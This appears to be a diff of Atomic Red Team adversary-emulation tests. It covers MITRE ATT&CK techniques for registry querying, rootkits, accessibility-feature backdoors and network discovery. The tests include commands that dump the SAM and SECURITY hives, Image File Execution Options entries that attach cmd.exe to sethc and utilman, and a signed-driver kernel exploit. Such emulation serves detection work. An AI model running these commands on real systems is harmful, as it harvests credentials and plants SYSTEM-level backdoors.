https://blog.cylance.com/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services
References:
http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf
https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_Find_Chart.en_us.pdf
**Supported Platforms:** Windows
**auto_generated_guid:** 8f7578c4-9863-4d83-875c-a565573bbdf0
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
#### Run it with `command_prompt`!
```
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"
reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"
reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
@@ -51,13 +47,10 @@ reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
reg query HKLM\system\currentcontrolset\services /s | findstr ImagePath 2>nul | findstr /Ri ".*\.sys$"
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query hklm\system\currentcontrolset\services /s | findstr ImagePath 2>nul | findstr /Ri ".*\.sys$"
reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg save HKLM\Security security.hive
reg save HKLM\System system.hive
reg save HKLM\SAM sam.hive
```
<br/>
atomics/T1012/T1012.yaml
+22 -12
View File
@@ -1,29 +1,38 @@
---
attack_technique: T1012
display_name: Query Registry
atomic_tests:
- name: Query Registry
auto_generated_guid: 8f7578c4-9863-4d83-875c-a565573bbdf0
description: |
Query Windows Registry.
Upon successful execution, cmd.exe will perform multiple reg queries. Some will succeed and others will fail (dependent upon OS).
Query Windows Registry
References:
https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order
https://blog.cylance.com/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services
References:
http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf
https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_Find_Chart.en_us.pdf
supported_platforms:
- windows
- windows
executor:
name: command_prompt
command: |
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"
reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"
reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
@@ -32,8 +41,9 @@ atomic_tests:
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
reg query HKLM\system\currentcontrolset\services /s | findstr ImagePath 2>nul | findstr /Ri ".*\.sys$"
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
name: command_prompt
elevation_required: true
reg query hklm\system\currentcontrolset\services /s | findstr ImagePath 2>nul | findstr /Ri ".*\.sys$"
reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg save HKLM\Security security.hive
reg save HKLM\System system.hive
reg save HKLM\SAM sam.hive
atomics/T1014/T1014.md
+19 -127
View File
@@ -1,8 +1,8 @@
# T1014 - Rootkit
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1014)
<blockquote>Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits)
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1014)
<blockquote>Rootkits are programs that hide the existence of malware by intercepting (i.e., [Hooking](https://attack.mitre.org/techniques/T1179)) and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a [Hypervisor](https://attack.mitre.org/techniques/T1062), Master Boot Record, or the [System Firmware](https://attack.mitre.org/techniques/T1019). (Citation: Wikipedia Rootkit)
Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)</blockquote>
Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)</blockquote>
## Atomic Tests
@@ -21,53 +21,15 @@ Loadable Kernel Module based Rootkit
**Supported Platforms:** Linux
**auto_generated_guid:** dfb50072-e45a-4c75-a17e-a484809c8553
#### Inputs:
| Name | Description | Type | Default Value |
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| rootkit_source_path | Path to the rootkit source. Used when prerequistes are fetched. | path | PathToAtomicsFolder/T1014/src/Linux|
| rootkit_path | Path To rootkit | String | PathToAtomicsFolder/T1014/bin/T1014.ko|
| rootkit_name | Module name | String | T1014|
| temp_folder | Temp folder used to compile the code. Used when prerequistes are fetched. | path | /tmp/T1014|
| rootkit_file | Path To Module | String | Module.ko|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo insmod #{rootkit_path}
#### Run it with `sh`!
```
#### Cleanup Commands:
```sh
sudo rmmod #{rootkit_name}
sudo insmod #{rootkit_file}
```
#### Dependencies: Run with `bash`!
##### Description: The kernel module must exist on disk at specified location (#{rootkit_path})
##### Check Prereq Commands:
```bash
if [ -f #{rootkit_path} ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```bash
if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi;
cp #{rootkit_source_path}/* #{temp_folder}/
cd #{temp_folder}; make
mv #{temp_folder}/#{rootkit_name}.ko #{rootkit_path}
[ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder}
```
<br/>
<br/>
@@ -77,108 +39,38 @@ Loadable Kernel Module based Rootkit
**Supported Platforms:** Linux
**auto_generated_guid:** 75483ef8-f10f-444a-bf02-62eb0e48db6f
#### Inputs:
| Name | Description | Type | Default Value |
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| rootkit_source_path | Path to the rootkit source. Used when prerequistes are fetched. | path | PathToAtomicsFolder/T1014/src/Linux|
| rootkit_path | Path To rootkit | String | PathToAtomicsFolder/T1014/bin/T1014.ko|
| rootkit_name | Module name | String | T1014|
| temp_folder | Temp folder used to compile the code. Used when prerequistes are fetched. | path | /tmp/T1014|
| rootkit_file | Path To Module | String | Module.ko|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo modprobe #{rootkit_name}
#### Run it with `sh`!
```
#### Cleanup Commands:
```sh
sudo modprobe -r #{rootkit_name}
sudo rm /lib/modules/$(uname -r)/#{rootkit_name}.ko
sudo depmod -a
sudo modprobe #{rootkit_file}
```
#### Dependencies: Run with `bash`!
##### Description: The kernel module must exist on disk at specified location (#{rootkit_path})
##### Check Prereq Commands:
```bash
if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```bash
if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi;
cp #{rootkit_source_path}/* #{temp_folder}/
cd #{temp_folder}; make
sudo cp #{temp_folder}/#{rootkit_name}.ko /lib/modules/$(uname -r)/
[ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder}
sudo depmod -a
```
<br/>
<br/>
## Atomic Test #3 - Windows Signed Driver Rootkit Test
This test exploits a signed driver to execute code in Kernel.
This example was curated from a blog that utilizes puppetstrings.exe with the vulnerable (signed driver) capcom.sys.
The capcom.sys driver may be found on github. A great reference is here: http://www.fuzzysecurity.com/tutorials/28.html
SHA1 C1D5CF8C43E7679B782630E93F5E6420CA1749A7
We leverage the work done here:
https://zerosum0x0.blogspot.com/2017/07/puppet-strings-dirty-secret-for-free.html
The hash of our PoC Exploit is
SHA1 DD8DA630C00953B6D5182AA66AF999B1E117F441
This will simulate hiding a process.
It would be wise if you only run this in a test environment
**Supported Platforms:** Windows
**auto_generated_guid:** 8e4e1985-9a19-4529-b4b8-b7a49ff87fae
#### Inputs:
| Name | Description | Type | Default Value |
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| driver_path | Path to a vulnerable driver | Path | C:&#92;Drivers&#92;driver.sys|
| puppetstrings_path | Path of puppetstrings.exe | Path | PathToAtomicsFolder&#92;T1014&#92;bin&#92;puppetstrings.exe|
| driver_path | Path to the vulnerable driver | Path | C:\Drivers\driver.sys|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
#{puppetstrings_path} #{driver_path}
#### Run it with `command_prompt`!
```
#### Dependencies: Run with `powershell`!
##### Description: puppetstrings.exe must exist on disk at specified location (#{puppetstrings_path})
##### Check Prereq Commands:
```powershell
if (Test-Path #{puppetstrings_path}) {exit 0} else {exit 1}
puppetstrings #{driver_path}
```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1014/bin/puppetstrings.exe" -OutFile "#{puppetstrings_path}"
```
<br/>
atomics/T1014/T1014.yaml
+25 -91
View File
@@ -1,130 +1,64 @@
---
attack_technique: T1014
display_name: Rootkit
display_name: Loadable Kernel Module based Rootkit
atomic_tests:
- name: Loadable Kernel Module based Rootkit
auto_generated_guid: dfb50072-e45a-4c75-a17e-a484809c8553
description: |
Loadable Kernel Module based Rootkit
supported_platforms:
- linux
- linux
input_arguments:
rootkit_source_path:
description: Path to the rootkit source. Used when prerequistes are fetched.
type: path
default: PathToAtomicsFolder/T1014/src/Linux
rootkit_path:
description: Path To rootkit
rootkit_file:
description: Path To Module
type: String
default: PathToAtomicsFolder/T1014/bin/T1014.ko
rootkit_name:
description: Module name
type: String
default: T1014
temp_folder:
description: Temp folder used to compile the code. Used when prerequistes are fetched.
type: path
default: /tmp/T1014
dependency_executor_name: bash
dependencies:
- description: |
The kernel module must exist on disk at specified location (#{rootkit_path})
prereq_command: |
if [ -f #{rootkit_path} ]; then exit 0; else exit 1; fi;
get_prereq_command: |
if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi;
cp #{rootkit_source_path}/* #{temp_folder}/
cd #{temp_folder}; make
mv #{temp_folder}/#{rootkit_name}.ko #{rootkit_path}
[ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder}
default: Module.ko
executor:
command: |
sudo insmod #{rootkit_path}
cleanup_command: |
sudo rmmod #{rootkit_name}
name: sh
elevation_required: true
command: |
sudo insmod #{rootkit_file}
- name: Loadable Kernel Module based Rootkit
auto_generated_guid: 75483ef8-f10f-444a-bf02-62eb0e48db6f
description: |
Loadable Kernel Module based Rootkit
supported_platforms:
- linux
- linux
input_arguments:
rootkit_source_path:
description: Path to the rootkit source. Used when prerequistes are fetched.
type: path
default: PathToAtomicsFolder/T1014/src/Linux
rootkit_path:
description: Path To rootkit
rootkit_file:
description: Path To Module
type: String
default: PathToAtomicsFolder/T1014/bin/T1014.ko
rootkit_name:
description: Module name
type: String
default: T1014
temp_folder:
description: Temp folder used to compile the code. Used when prerequistes are fetched.
type: path
default: /tmp/T1014
dependency_executor_name: bash
dependencies:
- description: |
The kernel module must exist on disk at specified location (#{rootkit_path})
prereq_command: |
if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;
get_prereq_command: |
if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi;
cp #{rootkit_source_path}/* #{temp_folder}/
cd #{temp_folder}; make
sudo cp #{temp_folder}/#{rootkit_name}.ko /lib/modules/$(uname -r)/
[ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder}
sudo depmod -a
default: Module.ko
executor:
command: |
sudo modprobe #{rootkit_name}
cleanup_command: |
sudo modprobe -r #{rootkit_name}
sudo rm /lib/modules/$(uname -r)/#{rootkit_name}.ko
sudo depmod -a
name: sh
elevation_required: true
command: |
sudo modprobe #{rootkit_file}
- name: Windows Signed Driver Rootkit Test
auto_generated_guid: 8e4e1985-9a19-4529-b4b8-b7a49ff87fae
description: |
This test exploits a signed driver to execute code in Kernel.
This example was curated from a blog that utilizes puppetstrings.exe with the vulnerable (signed driver) capcom.sys.
The capcom.sys driver may be found on github. A great reference is here: http://www.fuzzysecurity.com/tutorials/28.html
SHA1 C1D5CF8C43E7679B782630E93F5E6420CA1749A7
We leverage the work done here:
https://zerosum0x0.blogspot.com/2017/07/puppet-strings-dirty-secret-for-free.html
The hash of our PoC Exploit is
SHA1 DD8DA630C00953B6D5182AA66AF999B1E117F441
This will simulate hiding a process.
It would be wise if you only run this in a test environment
supported_platforms:
- windows
input_arguments:
driver_path:
description: Path to a vulnerable driver
description: Path to the vulnerable driver
type: Path
default: C:\Drivers\driver.sys
puppetstrings_path:
description: Path of puppetstrings.exe
type: Path
default: PathToAtomicsFolder\T1014\bin\puppetstrings.exe
dependency_executor_name: powershell
dependencies:
- description: |
puppetstrings.exe must exist on disk at specified location (#{puppetstrings_path})
prereq_command: |
if (Test-Path #{puppetstrings_path}) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1014/bin/puppetstrings.exe" -OutFile "#{puppetstrings_path}"
executor:
name: command_prompt
command: |
#{puppetstrings_path} #{driver_path}
elevation_required: true
puppetstrings #{driver_path}
atomics/T1014/src/Linux/Makefile
-7
View File
@@ -1,7 +0,0 @@
obj-m += T1014.o
all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
atomics/T1014/src/Linux/T1014.c
-21
View File
@@ -1,21 +0,0 @@
/*
* Source from https://linux.die.net/lkmpg/x121.html
* hello.c - The simplest kernel module.
*/
#include <linux/module.h> /* Needed by all modules */
#include <linux/kernel.h> /* Needed for KERN_INFO */
int init_module(void)
{
printk(KERN_INFO "Atomic kernel module T1014 loaded.\n");
/*
* A non 0 return means init_module failed; module can't be loaded.
*/
return 0;
}
void cleanup_module(void)
{
printk(KERN_INFO "Atomic kernel module T1014 unloaded.\n");
}
atomics/T1015/T1015.md
+163
View File
@@ -0,0 +1,163 @@
# T1015 - Accessibility Features
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1015)
<blockquote>Windows contains accessibility features that may be launched with a key combination before a user has logged in (for example, when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
Two common accessibility programs are <code>C:\Windows\System32\sethc.exe</code>, launched when the shift key is pressed five times and <code>C:\Windows\System32\utilman.exe</code>, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)
Depending on the version of Windows, an adversary may take advantage of these features in different ways because of code integrity enhancements. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in <code>%systemdir%\</code>, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced. Examples for both methods:
For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., <code>C:\Windows\System32\utilman.exe</code>) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
For the debugger method on Windows Vista and later as well as Windows Server 2008 and later, for example, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for the accessibility program (e.g., "utilman.exe"). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with RDP will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)
* On-Screen Keyboard: <code>C:\Windows\System32\osk.exe</code>
* Magnifier: <code>C:\Windows\System32\Magnify.exe</code>
* Narrator: <code>C:\Windows\System32\Narrator.exe</code>
* Display Switcher: <code>C:\Windows\System32\DisplaySwitch.exe</code>
* App Switcher: <code>C:\Windows\System32\AtBroker.exe</code></blockquote>
## Atomic Tests
- [Atomic Test #1 - Attaches Command Prompt As Debugger To Process - osk](#atomic-test-1---attaches-command-prompt-as-debugger-to-process---osk)
- [Atomic Test #2 - Attaches Command Prompt As Debugger To Process - sethc](#atomic-test-2---attaches-command-prompt-as-debugger-to-process---sethc)
- [Atomic Test #3 - Attaches Command Prompt As Debugger To Process - utilman](#atomic-test-3---attaches-command-prompt-as-debugger-to-process---utilman)
- [Atomic Test #4 - Attaches Command Prompt As Debugger To Process - magnify](#atomic-test-4---attaches-command-prompt-as-debugger-to-process---magnify)
- [Atomic Test #5 - Attaches Command Prompt As Debugger To Process - narrator](#atomic-test-5---attaches-command-prompt-as-debugger-to-process---narrator)
- [Atomic Test #6 - Attaches Command Prompt As Debugger To Process - DisplaySwitch](#atomic-test-6---attaches-command-prompt-as-debugger-to-process---displayswitch)
- [Atomic Test #7 - Attaches Command Prompt As Debugger To Process - AtBroker](#atomic-test-7---attaches-command-prompt-as-debugger-to-process---atbroker)
<br/>
## Atomic Test #1 - Attaches Command Prompt As Debugger To Process - osk
This allows adversaries to execute the attached process
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | osk.exe|
#### Run it with `command_prompt`!
```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
```
<br/>
<br/>
## Atomic Test #2 - Attaches Command Prompt As Debugger To Process - sethc
This allows adversaries to execute the attached process
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | sethc.exe|
#### Run it with `command_prompt`!
```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
```
<br/>
<br/>
## Atomic Test #3 - Attaches Command Prompt As Debugger To Process - utilman
This allows adversaries to execute the attached process
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | utilman.exe|
#### Run it with `command_prompt`!
```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
```
<br/>
<br/>
## Atomic Test #4 - Attaches Command Prompt As Debugger To Process - magnify
This allows adversaries to execute the attached process
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | magnify.exe|
#### Run it with `command_prompt`!
```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
```
<br/>
<br/>
## Atomic Test #5 - Attaches Command Prompt As Debugger To Process - narrator
This allows adversaries to execute the attached process
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | narrator.exe|
#### Run it with `command_prompt`!
```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
```
<br/>
<br/>
## Atomic Test #6 - Attaches Command Prompt As Debugger To Process - DisplaySwitch
This allows adversaries to execute the attached process
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | DisplaySwitch.exe|
#### Run it with `command_prompt`!
```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
```
<br/>
<br/>
## Atomic Test #7 - Attaches Command Prompt As Debugger To Process - AtBroker
This allows adversaries to execute the attached process
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | atbroker.exe|
#### Run it with `command_prompt`!
```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
```
<br/>
atomics/T1015/T1015.yaml
+123
View File
@@ -0,0 +1,123 @@
---
attack_technique: T1015
display_name: Accessibility Features
atomic_tests:
- name: Attaches Command Prompt As Debugger To Process - osk
description: |
This allows adversaries to execute the attached process
supported_platforms:
- windows
input_arguments:
target_executable:
description: File You Want To Attach cmd To
type: String
default: osk.exe
executor:
name: command_prompt
command: |
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
- name: Attaches Command Prompt As Debugger To Process - sethc
description: |
This allows adversaries to execute the attached process
supported_platforms:
- windows
input_arguments:
target_executable:
description: File You Want To Attach cmd To
type: String
default: sethc.exe
executor:
name: command_prompt
command: |
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
- name: Attaches Command Prompt As Debugger To Process - utilman
description: |
This allows adversaries to execute the attached process
supported_platforms:
- windows
input_arguments:
target_executable:
description: File You Want To Attach cmd To
type: String
default: utilman.exe
executor:
name: command_prompt
command: |
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
- name: Attaches Command Prompt As Debugger To Process - magnify
description: |
This allows adversaries to execute the attached process
supported_platforms:
- windows
input_arguments:
target_executable:
description: File You Want To Attach cmd To
type: String
default: magnify.exe
executor:
name: command_prompt
command: |
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
- name: Attaches Command Prompt As Debugger To Process - narrator
description: |
This allows adversaries to execute the attached process
supported_platforms:
- windows
input_arguments:
target_executable:
description: File You Want To Attach cmd To
type: String
default: narrator.exe
executor:
name: command_prompt
command: |
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
- name: Attaches Command Prompt As Debugger To Process - DisplaySwitch
description: |
This allows adversaries to execute the attached process
supported_platforms:
- windows
input_arguments:
target_executable:
description: File You Want To Attach cmd To
type: String
default: DisplaySwitch.exe
executor:
name: command_prompt
command: |
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
- name: Attaches Command Prompt As Debugger To Process - AtBroker
description: |
This allows adversaries to execute the attached process
supported_platforms:
- windows
input_arguments:
target_executable:
description: File You Want To Attach cmd To
type: String
default: atbroker.exe
executor:
name: command_prompt
command: |
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
atomics/T1016/T1016.md
+14 -318
View File
@@ -1,347 +1,43 @@
# T1016 - System Network Configuration Discovery
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1016)
<blockquote>Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).
Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.</blockquote>
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1016)
<blockquote>Adversaries will likely look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).</blockquote>
## Atomic Tests
- [Atomic Test #1 - System Network Configuration Discovery on Windows](#atomic-test-1---system-network-configuration-discovery-on-windows)
- [Atomic Test #1 - System Network Configuration Discovery](#atomic-test-1---system-network-configuration-discovery)
- [Atomic Test #2 - List Windows Firewall Rules](#atomic-test-2---list-windows-firewall-rules)
- [Atomic Test #3 - System Network Configuration Discovery](#atomic-test-3---system-network-configuration-discovery)
- [Atomic Test #4 - System Network Configuration Discovery (TrickBot Style)](#atomic-test-4---system-network-configuration-discovery-trickbot-style)
- [Atomic Test #5 - List Open Egress Ports](#atomic-test-5---list-open-egress-ports)
- [Atomic Test #6 - Adfind - Enumerate Active Directory Subnet Objects](#atomic-test-6---adfind---enumerate-active-directory-subnet-objects)
- [Atomic Test #7 - Qakbot Recon](#atomic-test-7---qakbot-recon)
- [Atomic Test #8 - List macOS Firewall Rules](#atomic-test-8---list-macos-firewall-rules)
- [Atomic Test #2 - System Network Configuration Discovery](#atomic-test-2---system-network-configuration-discovery)
<br/>
## Atomic Test #1 - System Network Configuration Discovery on Windows
## Atomic Test #1 - System Network Configuration Discovery
Identify network configuration information
Upon successful execution, cmd.exe will spawn multiple commands to list network configuration settings. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** 970ab6a1-0157-4f3f-9a73-ec4166754b23
#### Attack Commands: Run with `command_prompt`!
```cmd
#### Run it with `command_prompt`!
```
ipconfig /all
netsh interface show interface
netsh interface show
arp -a
nbtstat -n
net config
```
<br/>
<br/>
## Atomic Test #2 - List Windows Firewall Rules
Enumerates Windows Firewall Rules using netsh.
Upon successful execution, cmd.exe will spawn netsh.exe to list firewall rules. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** 038263cb-00f4-4b0a-98ae-0696c67e1752
#### Attack Commands: Run with `command_prompt`!
```cmd
netsh advfirewall firewall show rule name=all
```
<br/>
<br/>
## Atomic Test #3 - System Network Configuration Discovery
Identify network configuration information.
Upon successful execution, sh will spawn multiple commands and output will be via stdout.
